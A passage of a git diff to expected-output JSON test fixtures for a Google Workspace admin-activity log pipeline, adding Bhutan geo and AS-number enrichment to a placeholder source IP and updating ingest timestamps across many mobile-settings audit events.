"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "USER_LICENSE_REVOKE", @@ -466,6 +550,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -475,7 +571,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984571100Z", + "ingested": "2021-12-14T14:44:41.268410141Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"UPDATE_DYNAMIC_LICENSE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "UPDATE_DYNAMIC_LICENSE", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json index e3609db5e6d..00eba1d9377 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json @@ -36,6 +36,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -45,7 +57,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977331400Z", + "ingested": "2021-12-14T14:44:42.510359841Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_CANCELLED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ACTION_CANCELLED", @@ -103,6 +115,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -112,7 +136,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977336100Z", + "ingested": "2021-12-14T14:44:42.510362055Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_REQUESTED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ACTION_REQUESTED", @@ -168,6 +192,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -177,7 +213,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977342Z", + "ingested": "2021-12-14T14:44:42.510362526Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"name\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ADD_MOBILE_CERTIFICATE", @@ -232,6 +268,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -241,7 +289,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977346Z", + "ingested": "2021-12-14T14:44:42.510362909Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICES_BULK_CREATION\",\"parameters\":[{\"name\":\"NUMBER_OF_COMPANY_OWNED_DEVICES\",\"intValue\":10}]}}", "provider": "admin", "action": "COMPANY_DEVICES_BULK_CREATION", @@ -296,6 +344,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -305,7 +365,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977351400Z", + "ingested": "2021-12-14T14:44:42.510363309Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_BLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "COMPANY_OWNED_DEVICE_BLOCKED", @@ -360,6 +420,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -369,7 +441,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977356500Z", + "ingested": "2021-12-14T14:44:42.510363699Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICE_DELETION\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "COMPANY_DEVICE_DELETION", @@ -424,6 +496,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -433,7 +517,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977362400Z", + "ingested": "2021-12-14T14:44:42.510364065Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_UNBLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "COMPANY_OWNED_DEVICE_UNBLOCKED", @@ -488,6 +572,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -497,7 +593,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977367Z", + "ingested": "2021-12-14T14:44:42.510364436Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_WIPED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "COMPANY_OWNED_DEVICE_WIPED", @@ -552,6 +648,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -561,7 +669,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977371900Z", + "ingested": "2021-12-14T14:44:42.510364806Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT\",\"parameters\":[{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"GROUP\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"NEW_PERMISSION_GRANT_STATE\",\"value\":\"GRANTED\"},{\"name\":\"OLD_PERMISSION_GRANT_STATE\",\"value\":\"DENIED\"},{\"name\":\"PERMISSION_GROUP_NAME\",\"value\":\"LOCATION\"}]}}", "provider": "admin", "action": "CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT", @@ -616,6 +724,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -625,7 +745,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977408Z", + "ingested": "2021-12-14T14:44:42.510365176Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER", @@ -680,6 +800,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -689,7 +821,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977440Z", + "ingested": "2021-12-14T14:44:42.510365549Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}", "provider": "admin", "action": "REMOVE_MOBILE_APPLICATION_FROM_WHITELIST", @@ -744,6 +876,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -753,7 +897,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977446700Z", + "ingested": "2021-12-14T14:44:42.510366124Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_MOBILE_APPLICATION_SETTINGS", @@ -809,6 +953,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -818,7 +974,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977455100Z", + "ingested": "2021-12-14T14:44:42.510366510Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}", "provider": "admin", "action": "ADD_MOBILE_APPLICATION_TO_WHITELIST", @@ -873,6 +1029,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -882,7 +1050,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977475700Z", + "ingested": "2021-12-14T14:44:42.510366874Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_APPROVE", @@ -938,6 +1106,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -947,7 +1127,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977481300Z", + "ingested": "2021-12-14T14:44:42.510367233Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_BLOCK", @@ -1003,6 +1183,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1012,7 +1204,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977512300Z", + "ingested": "2021-12-14T14:44:42.510367597Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_DELETE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_DELETE", @@ -1068,6 +1260,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1077,7 +1281,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977517500Z", + "ingested": "2021-12-14T14:44:42.510368115Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_WIPE", @@ -1133,6 +1337,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1142,7 +1358,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977521800Z", + "ingested": "2021-12-14T14:44:42.510368494Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_MOBILE_SETTING", @@ -1198,6 +1414,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1207,7 +1435,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977526700Z", + "ingested": "2021-12-14T14:44:42.510368858Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_ADMIN_RESTRICTIONS_PIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_ADMIN_RESTRICTIONS_PIN", @@ -1262,6 +1490,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1271,7 +1511,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977532400Z", + "ingested": "2021-12-14T14:44:42.510369220Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_MOBILE_WIRELESS_NETWORK", @@ -1326,6 +1566,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1335,7 +1587,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977538100Z", + "ingested": "2021-12-14T14:44:42.510369589Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ADD_MOBILE_WIRELESS_NETWORK", @@ -1390,6 +1642,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1399,7 +1663,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977559600Z", + "ingested": "2021-12-14T14:44:42.510369953Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "REMOVE_MOBILE_WIRELESS_NETWORK", @@ -1454,6 +1718,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": 